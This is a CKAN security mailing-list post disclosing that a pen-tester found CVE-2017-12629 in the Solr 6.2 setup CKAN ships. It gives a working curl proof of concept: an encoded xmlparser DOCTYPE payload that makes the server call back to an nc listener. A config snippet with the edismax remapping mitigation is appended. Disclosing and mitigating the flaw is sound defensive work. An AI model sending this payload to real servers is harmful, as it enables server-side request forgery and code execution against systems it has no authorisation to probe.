[CKAN-Security] solr 6.2

JD Bothma jd at openup.org.za
Wed Feb 21 07:53:53 UTC 2018


Hi

We've contracted someone to pen-test data.vulekamali.gov.za who found the
following critical vulnerability in CKAN 6.2 as used in the Dockerfile
under contrib

https://www.cvedetails.com/cve/CVE-2017-12629/
https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc

We're launching our portal right now so not comfortable upgrading solr just
yet, but remapping the xmlparser name to the edismax class has mitigated it
for us for now. See
https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list

I confirmed the vulnerability with the following curl request against a
locally-running ckan instance:
curl -v 'localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D'

On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when running
the request against ckan, I saw a GET request in nc. You can also verify
the vulnerability by looking for "Connection Refused" in the error response
which shows the server tried to request the DOCTYPE you told it to, and
would have executed malicious code you would have served.

Best
JD
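The remapping JD describes is the interim mitigation from the linked Solr news item: register the `xmlparser` query parser name against the edismax plugin class so a `{!xmlparser ...}` local-params request no longer reaches the XML-parsing code path. The fragment below is an added example, not part of the original message or of CKAN's own configuration; it assumes the `solrconfig.xml` of the Solr core that CKAN searches against (the core name and the rest of the file are placeholders).

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<!-- Added example: solrconfig.xml for the CKAN Solr core (core name assumed). -->
<config>
  <luceneMatchVersion>6.2.0</luceneMatchVersion>

  <!-- ... existing request handlers, schema factory, etc. ... -->

  <!--
    Mitigation for CVE-2017-12629 (SOLR-11477) on Solr versions that still
    ship the vulnerable XML query parser. Solr resolves the name inside
    {!xmlparser ...} through the queryParser registry; binding that name to
    the edismax plugin means the request is parsed as an ordinary edismax
    query string and the DOCTYPE/SYSTEM entity is never fetched.
    This does not remove the XmlQParserPlugin class; upgrading Solr is the
    real fix.
  -->
  <queryParser name="xmlparser" class="solr.ExtendedDismaxQParserPlugin"/>

  <requestHandler name="/select" class="solr.SearchHandler">
    <lst name="defaults">
      <str name="echoParams">explicit</str>
      <int name="rows">10</int>
    </lst>
  </requestHandler>
</config>
```

After restarting Solr (or reloading the core), rerunning the curl request above should no longer produce a connection on the nc listener and should no longer return a "Connection Refused" error, because the payload is now treated as plain edismax query text rather than XML.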